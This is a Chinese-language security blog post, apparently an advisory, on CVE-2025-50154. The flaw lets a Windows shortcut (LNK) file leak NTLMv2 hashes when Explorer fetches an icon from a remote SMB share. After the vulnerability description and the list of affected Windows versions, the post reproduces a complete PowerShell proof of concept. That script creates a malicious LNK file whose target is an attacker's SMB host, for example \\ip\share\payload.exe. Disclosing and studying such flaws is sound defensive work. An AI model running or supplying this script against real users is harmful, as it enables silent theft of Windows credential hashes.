首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >CVE-2025-50154|Microsoft Windows 文件资源管理器欺骗漏洞(POC)

CVE-2025-50154|Microsoft Windows 文件资源管理器欺骗漏洞(POC)

作者头像
信安百科
发布2025-08-18 15:11:42
发布2025-08-18 15:11:42
30100
代码可运行
举报
文章被收录于专栏:信安百科信安百科
运行总次数:0
代码可运行

0x00 前言

Windows文件资源管理器是Windows操作系统的核心文件管理工具,用于浏览、整理文件和文件夹。它采用树形结构视图展示本地磁盘和网络资源,支持复制、移动、删除等操作。界面包含导航窗格、地址栏和功能区菜单,便于快速访问和预览。

0x01 漏洞描述

漏洞涉及Windows资源管理器处理LNK快捷方式文件时的安全问题。具体来说:

1. 漏洞根源在于资源管理器解析LNK文件图标时的缺陷

2. 微软之前修复了通过UNC路径加载图标的安全问题(CVE-2025-24054)

3. 但遗漏了另一种攻击方式:当LNK文件同时满足以下条件时仍会触发漏洞:

(1)图标路径指向本地系统文件(如shell32.dll)。

(2)可执行路径指向远程SMB共享中的程序文件。

4. 这种情况下,资源管理器会自动下载远程文件来提取其内嵌图标资源

5. 此过程会在用户无感知的情况下发起NTLM认证,导致NTLMv2-SSP哈希值泄露

0x02 CVE编号

CVE-2025-50154

0x03 影响版本

代码语言:javascript
代码运行次数:0
运行
复制
Windows 10 Version 21H2 for 32-bit Systems
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows Server 2025
Windows 11 Version 24H2 for x64-based Systems
Windows 11 Version 24H2 for ARM64-based Systems
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows 11 Version 23H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows Server 2025 (Server Core installation)
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 21H2 for ARM64-based Systems

0x04 漏洞详情

POC:

https://github.com/rubenformation/CVE-2025-50154

代码语言:javascript
代码运行次数:0
运行
复制
<#
.SYNOPSIS
    Creates a malicious LNK file that triggers SMB NTLMv2-SSP hash disclosure.
    This code is for educational and research purposes only.
    The author takes no responsibility for any misuse of this code.
.DESCRIPTION
    This script generates a .LNK shortcut pointing to a remote SMB-hosted binary file.
    The shortcut uses a default Windows icon (SHELL32.dll) but still forces Explorer to
    fetch the PE icon from the remote binary, triggering authentication.
.PARAMETER path
    Local path where the LNK file will be saved (e.g., C:\Users\User\Desktop).
.PARAMETER ip
    IP address or hostname of the remote SMB server hosting the binary.
.PARAMETER share
    The shared folder on the SMB server where the binary is stored.
.PARAMETER file
    The name of the binary file (e.g., payload.exe).
.EXAMPLE
    .\poc.ps1 -path "C:\Temp" -ip "192.168.1.10" -share "malware" -file "payload.exe"
#>
param(
    [Parameter(Mandatory=$true)]
    [string]$path,    # -path
    [Parameter(Mandatory=$true)]
    [string]$ip,      # -ip
    [Parameter(Mandatory=$true)]
    [string]$share,   # -share
    [Parameter(Mandatory=$true)]
    [string]$file     # -file
)
# Build file paths
$shortcutPath = Join-Path $path "poc.lnk"
$targetPath = "\\$ip\$share\$file"
$iconLocation = "C:\Windows\System32\SHELL32.dll"
# Create LNK file
$wShell = New-Object -ComObject WScript.Shell
$shortcut = $wShell.CreateShortcut($shortcutPath)
$shortcut.TargetPath = $targetPath
$shortcut.IconLocation = $iconLocation
$shortcut.Save()
Write-Output "Shortcut created at: $shortcutPath"
Write-Output "Target path: $targetPath"

0x05 参考链接

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-50154/

推荐阅读:

CVE-2025-48799|Windows Update 服务本地权限提升漏洞(POC)

【漏洞复现】CVE-2025-33073|Windows SMB 权限提升漏洞

CVE-2025-33073|Windows SMB权限提升漏洞

Ps:国内外安全热点分享,欢迎大家分享、转载,请保证文章的完整性。文章中出现敏感信息和侵权内容,请联系作者删除信息。信息安全任重道远,感谢您的支持

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2025-08-16,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 信安百科 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档